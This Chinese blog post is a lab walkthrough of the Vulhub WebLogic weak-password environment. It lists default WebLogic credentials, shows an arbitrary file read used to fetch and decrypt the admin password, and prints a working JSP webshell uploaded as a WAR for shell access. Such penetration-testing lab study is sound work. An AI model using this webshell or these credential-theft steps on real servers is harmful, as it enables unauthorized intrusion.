中间件漏洞|weblogic weak_password、任意文件读取

已于 2024-03-15 00:32:49 修改
阅读量607 收藏 5
点赞数 8
文章标签: 中间件 web安全 weblogic
于 2024-03-15 00:23:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/136722546
版权
本文详细介绍了如何在Kali系统上搭建WebLogic基于Vulhub的靶场环境,包括解决gitclone问题、启动靶场、利用弱口令和漏洞进行攻击(如任意文件读取、后台文件上传获取shell),以及如何解密密文和实现getshell。最后,还提供了关闭靶场的方法。
摘要由CSDN通过智能技术生成

目录

1.搭建vulhub靶场,因为weblogic基于vulhub靶场环境

2.启动靶场

3.进入靶场进行复现

1.弱口令

任意文件读取

后台文件上传getshell

1.搭建vulhub靶场,因为weblogic基于vulhub靶场环境

我自己搜了不少博客,结果总在最后git clone的时候出问题,最后找到了下面这篇文章:

kali下搭建Vulhub靶场(详细附图)_ulhub靶场搭建_看我的眼色行事的博客-csdn博客-CSDN博客

2.启动靶场

cd /root/vulhub/weblogic/weak_password  #到靶场目录下cat

ls #查看文件

more README.md  #该文件包含了靶场的相关信息,如何访问,漏洞复现等

systemctl start docker #启动容器

docker-compose up -d  #在此目录下启动靶场,等待

3.进入靶场进行复现

弱口令

该网站下面存在弱口令命令:

用户名:weblogic;  密码:Oracle@123

weblogic常见弱口令:

用户名      密码
system     --password
weblogic   --weblogic
admin      --security
joe        --password
mary       --password
system     --security
wlcsystem  --wlcsystem

此处如果不存在弱口令,我们又该如何登录?

任意文件读取

本环境前台模拟了一个任意文件下载漏洞,访问`http://your-ip:7001/hello/file.jsp?path=/etc/passwd`可见成功读取passwd文件。那么,该漏洞如何利用?

###我们使用该漏洞读取后台用户的密文和密钥文件###
weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为`SerializedSystemIni.dat`和`config.xml`,在本环境中为`./security/SerializedSystemIni.dat`和`./config/config.xml`(基于当前目录`/root/Oracle/Middleware/user_projects/domains/base_domain`)。

访问,浏览器会自动下载该文件,或者也可以使用burpsuite的repeater模块,但是因为`SerializedSystemIni.dat`是一个二进制文件,所以选中乱码,copy to file 到以该命名的文件名下,进行查看

然后再访问密钥文件

找到特定标签,‘manager-password’,上述即为加密后的管理员密码

解密密文:然后使用本环境的decrypt目录下的weblogic_decrypt.jar,解密密文

 与之前的弱口令一致

后台文件上传getshell

登录后,点击install

然后uplaod your file

因为只允许war文件,所以上传666.war,如何生成?先创建666.jsp,写入jsp的一句话木马,在解压为zip,在更名为666.war即可,一句话木马如下,密码为passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

然后就一直next,直到finish

然后访问ip:7001/666/x.jsp,蚁剑连接即可

 复现成功!

4.关闭靶场

回到之前的目录下关闭靶场!

docker-compose down

Yf3_te
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic常见漏洞
GJ_ia的博客
01-14 191
Weblogic 开启了 Web Service Test Page(web服务测试页面),这个配置默认在生产模式下是不开启的,由于管理员没注意开启了这个页面就可能造成任意文件上传。影响版本cve-2020-14882(代码执行漏洞) ,在打完补丁后又出现了补丁被绕过的漏洞 cve-2020-14883(权限绕过漏洞),远程攻击者可以配合这两个漏洞构造特殊的HTTP请求,在未经身份认证的情况下接管 Weblogic Server Console,在控制台中执行任意代码。
weblogic数据源密码和控制台密码加解密
热门推荐
jiygmg的博客
06-27 1万+
aaaa
weblogic [WeakPassword]
npc88888的博客
05-09 502
开放了wblogic端口,进去发现有任意读取文件漏洞,配合解密工具读出密码,登录后台传入webshell。然后看reponse那堆乱码,右键保存文件,这个是。1.设置Config.do页面登录授权后访问;2.IPS等防御产品可以加入相应的特征;首先我们先进入weblogic目录,找到框着的这个 这个是密文。3.升级到官方最新版本。生成webshell。
weblogic 文件打开数_Weblogic任意文件读取任意文件上传
weixin_39586335的博客
12-03 421
引言weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现。环境搭建 环境搭建: 首先安装weblogic 下载地址 http://www.oracle.com/technetwork/cn/middleware/weblogic/downloads/wls-main-091116-zhs.html安装目录没特别需求可以不更改,一...
Weblogic(weak_password)任意文件读取、口令破解、文件上传 漏洞复现
陈瘦瘦的迪迦的博客
08-07 1814
Weblogic弱口令文件上传(weak_password)漏洞复现 漏洞形成原因 本环境存在 任意文件读取漏洞,可利用此漏洞配合解密工具得到登陆密码 登录后台后存在上传点,可上传一句话拿shell 漏洞如何利用 任意文件读取 , http://172.16.2.174:7001/hello/file.jsp?path= #接文件路径 上传一句话拿shell 漏洞复现过程 Kali docker 容器中启动此漏洞环境 任意文件读取 weblogic密码使用AES(老版本3DES)加密
weblogic任意文件读取漏洞+后台任意上传
菜鸟耿耿
10-12 620
weblogic任意文件读取漏洞+后台任意上传 漏洞环境描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 影响版本: Weblogic版本:10.3.6(11g) Java版本:1.6 环境搭建 靶机IP: 192.168.35.144 攻击者IP:192.168.35.128 启动环境 docker-compose up -d 访问后台登陆页面:url:http://192.168.35.144
中间件漏洞 | weblogic-弱口令/任意文件读取
weixin_52116519的博客
10-16 1471
一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。通俗地讲weblogic是一种web容器,把我们开发的java应用程序运行起来,并提供服务。服务器:Microsoft Azure云服务器(学生优惠)操作系统:Linux (ubuntu 20.04)环境搭建:使用docker搭建vulhub,并使用weblogic靶场本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞
通过任意文件读取获取weblogic账号密码
最新发布
mashiro_hibiki的博客
05-13 381
对于weblogic获取到账号密码的前提是有任意文件读取存在,当任意文件读取存在时是可以读取配置文件来对账号密码进行解密。weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。在该测试环境中的配置文件路径为和。
101web漏洞挖掘之任意文件读取漏洞1
08-03
任意文件读取漏洞详解】 任意文件读取漏洞是一种常见的Web安全问题,主要发生在PHP、Java和Python等编程语言中。这种漏洞允许攻击者通过构造特定的请求,读取服务器上的任意文件,包括敏感的配置文件、源代码、...
Decrypt_Weblogic_Password-master.zip
08-07
本资源"Decrypt_Weblogic_Password-master.zip"是一个专门针对WebLogic密码解密的工具,它旨在帮助管理员或开发者处理与WebLogic密码相关的加密问题。 WebLogic Server使用的密码加密算法是基于对称加密技术,早期...
Weblogic-Weakpassword-Scnner
05-01
Weblogic-弱密码-Scnner 点安装请求您可以使用masscan扫描具有CIDR格式的ip范围masscan -iL ip.txt -oL 7001.txt -p 7001 --max-rate=80000awk '{print $4,$3}' 7001.txt|sed 's/ /:/g' >> scanned.txt有关Masscan的...
WebLogic_EXP.jar WebLogic反序列化利用工具
10-31
WebLogic_EXP.jar WebLogic反序列化利用工具下载,作者rebyond。 使用环境 JDK1.8
weblogic10.X AES加解密
06-27
weblogic10.X AES加解密 jdbc加解密 boot.properties加解密 WLEncrypt:=========================== encrypt result:{AES}f5GuX7x1nWKVrz2yTneeiKBRMDkE1Z08Ud/rcZYozwE= decrypt result:weblogic WLEncrypt:===========================
weblogic密码加解密 - rznice的专栏 - CSDN博客1
08-03
1. 密钥K1进DES加密 2. K2对步骤1的结果进DES解密 3. 步骤2的结果使密钥K1进DES加密
BEA WebLogic Server_WebLogic Server_app.zip_weblogic
09-21
【标题】"BEA WebLogic Server_WebLogic Server_app.zip_weblogic" 提示我们讨论的主题是 BEA WebLogic Server,这是一款由BEA Systems(后被Oracle公司收购)开发的企业级Java应用程序服务器,主要用于部署和管理...
GUANLIXITONG.rar_WEBLOGIC oracle_java oracle_oracle_weblogic
09-23
【标签】中的"weblogic_oracle"和"java_oracle"进一步强调了WebLogic服务器与Oracle数据库的结合使用,这两个组件的结合可以提供高效的数据处理能力,支持大规模并发访问,并具有良好的可扩展性。"oracle"和...
Weblogic (weak_password)漏洞复现
huangyongkang666的博客
07-22 1798
Weblogic (weak_password)漏洞复现
Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-29 640
这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?现在我们打开BP,点击进入 Repeater 重放模块,重放以下的数据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码。然后我们重新发送以下的数据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到。
WebLogic Server 账号密码密文解密小方法
做自己喜欢的事,并将其发挥到极致!
03-20 1590
WebLogic Server 账号密码密文解密小方法
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
Weblogic漏洞主要包括SSRF、任意文件上传和反序列化漏洞。反序列化漏洞尤其危险,如CVE-2015-4852、CVE-2016-0638等,这些漏洞可能导致远程代码执行,允许攻击者控制服务器。 3. Nginx:作为一款高性能的HTTP和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值